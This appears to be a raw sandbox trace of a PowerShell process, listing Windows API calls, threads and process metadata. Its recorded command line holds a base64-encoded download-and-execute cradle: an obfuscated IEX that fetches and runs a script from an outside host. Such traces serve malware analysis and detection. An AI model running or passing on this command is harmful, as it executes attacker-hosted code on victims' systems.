	[0927.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0931.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0931.005] SetErrorMode (uMode=0x1) returned 0x1
	[0931.005] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xed6a0 | out: lpFileInformation=0xed6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0931.005] SetErrorMode (uMode=0x1) returned 0x1
	[0963.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.635] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0963.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.636] CoTaskMemFree (pv=0x1b7b02d0) 
	[0963.638] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0963.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.638] CoTaskMemFree (pv=0x1b7b02d0) 
	[0963.638] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0963.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.639] CoTaskMemFree (pv=0x1b7b02d0) 
	[0963.641] CoCreateGuid (in: pguid=0xeda68 | out: pguid=0xeda68*(Data1=0xfee3d340, Data2=0xe0f5, Data3=0x4027, Data4=([0]=0x99, [1]=0x2d, [2]=0xe3, [3]=0xad, [4]=0x38, [5]=0x56, [6]=0xf2, [7]=0xf))) returned 0x0
	[0963.644] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0963.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.644] CoTaskMemFree (pv=0x1b7b02d0) 
	[0963.646] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0963.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.646] CoTaskMemFree (pv=0x1b7b02d0) 
	[0963.648] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0963.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.648] CoTaskMemFree (pv=0x1b7b02d0) 
	[0963.667] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0964.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xed710 | out: lpConsoleScreenBufferInfo=0xed710) returned 1
	[0964.156] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0964.157] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xed710 | out: lpConsoleScreenBufferInfo=0xed710) returned 1
	[0964.160] GetCurrentProcess () returned 0xffffffffffffffff
	[0964.161] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xed738 | out: TokenHandle=0xed738*=0xe4) returned 1
	[0964.163] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed658 | out: TokenInformation=0x0, ReturnLength=0xed658) returned 0
	[0964.164] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2af2d0
	[0964.164] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x2af2d0, TokenInformationLength=0x4, ReturnLength=0xed658 | out: TokenInformation=0x2af2d0, ReturnLength=0xed658) returned 1
	[0964.165] DuplicateTokenEx (in: hExistingToken=0xe4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xed7b8 | out: phNewToken=0xed7b8*=0x2f0) returned 1
	[0964.166] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed658 | out: TokenInformation=0x0, ReturnLength=0xed658) returned 0
	[0964.166] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2af300
	[0964.166] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x2af300, TokenInformationLength=0x4, ReturnLength=0xed658 | out: TokenInformation=0x2af300, ReturnLength=0xed658) returned 1
	[0964.167] CheckTokenMembership (in: TokenHandle=0x2f0, SidToCheck=0x2cebc60*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xed7c8 | out: IsMember=0xed7c8) returned 1
	[0964.167] CloseHandle (hObject=0x2f0) returned 1
	[0964.495] CoTaskMemAlloc (cb=0x804) returned 0x1b7c3fa0
	[0964.495] GetConsoleTitleW (in: lpConsoleTitle=0x1b7c3fa0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0964.496] CoTaskMemFree (pv=0x1b7c3fa0) 
	[0964.511] CoTaskMemAlloc (cb=0x804) returned 0x1b7c4850
	[0964.511] GetConsoleTitleW (in: lpConsoleTitle=0x1b7c4850, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0964.512] CoTaskMemFree (pv=0x1b7c4850) 
	[0964.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.514] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0964.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.999] SetConsoleCtrlHandler (HandlerRoutine=0x238689c, Add=1) returned 1
	[0965.018] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0965.019] CoCreateGuid (in: pguid=0xed8b0 | out: pguid=0xed8b0*(Data1=0xefc81e68, Data2=0x7652, Data3=0x4afb, Data4=([0]=0xa6, [1]=0xc4, [2]=0x0, [3]=0xae, [4]=0x99, [5]=0xab, [6]=0x7a, [7]=0x6c))) returned 0x0
	[0965.367] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0965.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.367] CoTaskMemFree (pv=0x1b7b02d0) 
	[0966.603] WinSqmIsOptedIn () returned 0x0
	[0966.603] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0966.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.603] CoTaskMemFree (pv=0x1b7b02d0) 
	[0966.604] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0966.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.604] CoTaskMemFree (pv=0x1b7b02d0) 
	[0967.559] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0967.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.559] CoTaskMemFree (pv=0x1b7b02d0) 
	[0967.559] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0967.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.560] CoTaskMemFree (pv=0x1b7b02d0) 
	[0967.560] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0967.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.560] CoTaskMemFree (pv=0x1b7b02d0) 
	[0968.955] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0968.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.955] CoTaskMemFree (pv=0x1b7b02d0) 
	[0968.956] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0968.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.956] CoTaskMemFree (pv=0x1b7b02d0) 
	[0968.957] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0968.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.957] CoTaskMemFree (pv=0x1b7b02d0) 
	[0968.964] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0968.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.964] CoTaskMemFree (pv=0x1b7b02d0) 
	[0970.255] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0970.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.255] CoTaskMemFree (pv=0x1b7b02d0) 
	[0970.258] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0970.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.258] CoTaskMemFree (pv=0x1b7b02d0) 
	[0970.259] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0970.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.259] CoTaskMemFree (pv=0x1b7b02d0) 

Thread:
	id = 494
	os_tid = 0x1234


Thread:
	id = 502
	os_tid = 0x125c


Thread:
	id = 1216
	os_tid = 0x1a0c


Thread:
	id = 1219
	os_tid = 0x1a20


Thread:
	id = 1257
	os_tid = 0x1c50


Thread:
	id = 1322
	os_tid = 0x1de8


Thread:
	id = 1587
	os_tid = 0x2148


Thread:
	id = 1598
	os_tid = 0x2170

	[0815.944] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0893.011] RegCloseKey (hKey=0x2e8) returned 0x0
	[0893.011] RegCloseKey (hKey=0x2f0) returned 0x0
	[0893.011] RegCloseKey (hKey=0x2ec) returned 0x0

Thread:
	id = 1920
	os_tid = 0x25e4


Process:
	id = "91"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6f003000"
	os_pid = "0x1184"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 474
	os_tid = 0x1188

	[0484.477] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0486.965] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0486.966] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0486.966] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0486.966] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0495.242] GetVersionExW (in: lpVersionInformation=0x22db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0495.244] GetVersionExW (in: lpVersionInformation=0x22db20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22db20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0495.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0495.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0495.257] GetVersionExW (in: lpVersionInformation=0x22d890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22d890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0495.257] SetErrorMode (uMode=0x1) returned 0x1
	[0495.258] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22d9f0 | out: lpFileInformation=0x22d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0495.259] SetErrorMode (uMode=0x1) returned 0x1
	[0495.262] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22dc60 | out: lpdwHandle=0x22dc60) returned 0x94c
	[0495.264] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2aa72d8 | out: lpData=0x2aa72d8) returned 1
	[0495.266] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22dbd8, puLen=0x22dbd0 | out: lplpBuffer=0x22dbd8*=0x2aa7374, puLen=0x22dbd0) returned 1
	[0495.269] lstrlenW (lpString="䅁") returned 1
	[0495.278] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa7450, puLen=0x22db40) returned 1
	[0495.278] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0495.280] CoTaskMemAlloc (cb=0x2e) returned 0x3bb5c0
	[0495.280] lstrcpyW (in: lpString1=0x3bb5c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0495.281] CoTaskMemFree (pv=0x3bb5c0) 
	[0495.281] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa74a4, puLen=0x22db40) returned 1
	[0495.281] lstrlenW (lpString="System.Management.Automation") returned 28
	[0495.281] CoTaskMemAlloc (cb=0x3c) returned 0x2f9860
	[0495.282] lstrcpyW (in: lpString1=0x2f9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0495.282] CoTaskMemFree (pv=0x2f9860) 
	[0495.282] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa7500, puLen=0x22db40) returned 1
	[0495.282] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0495.282] CoTaskMemAlloc (cb=0x20) returned 0x3bbb00
	[0495.282] lstrcpyW (in: lpString1=0x3bbb00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0495.282] CoTaskMemFree (pv=0x3bbb00) 
	[0495.282] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa7540, puLen=0x22db40) returned 1
	[0495.282] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0495.282] CoTaskMemAlloc (cb=0x44) returned 0x2f9860
	[0495.282] lstrcpyW (in: lpString1=0x2f9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0495.282] CoTaskMemFree (pv=0x2f9860) 
	[0495.282] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa75a8, puLen=0x22db40) returned 1
	[0495.282] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0495.282] CoTaskMemAlloc (cb=0x76) returned 0x3616a0
	[0495.282] lstrcpyW (in: lpString1=0x3616a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0495.282] CoTaskMemFree (pv=0x3616a0) 
	[0495.282] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa7644, puLen=0x22db40) returned 1
	[0495.282] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0495.282] CoTaskMemAlloc (cb=0x44) returned 0x2f9860
	[0495.282] lstrcpyW (in: lpString1=0x2f9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0495.282] CoTaskMemFree (pv=0x2f9860) 
	[0495.283] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa76a8, puLen=0x22db40) returned 1
	[0495.283] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0495.283] CoTaskMemAlloc (cb=0x58) returned 0x382520
	[0495.283] lstrcpyW (in: lpString1=0x382520, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0495.283] CoTaskMemFree (pv=0x382520) 
	[0495.283] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa7724, puLen=0x22db40) returned 1
	[0495.283] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0495.283] CoTaskMemAlloc (cb=0x20) returned 0x3bbb00
	[0495.283] lstrcpyW (in: lpString1=0x3bbb00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0495.283] CoTaskMemFree (pv=0x3bbb00) 
	[0495.283] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x2aa73cc, puLen=0x22db40) returned 1
	[0495.283] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
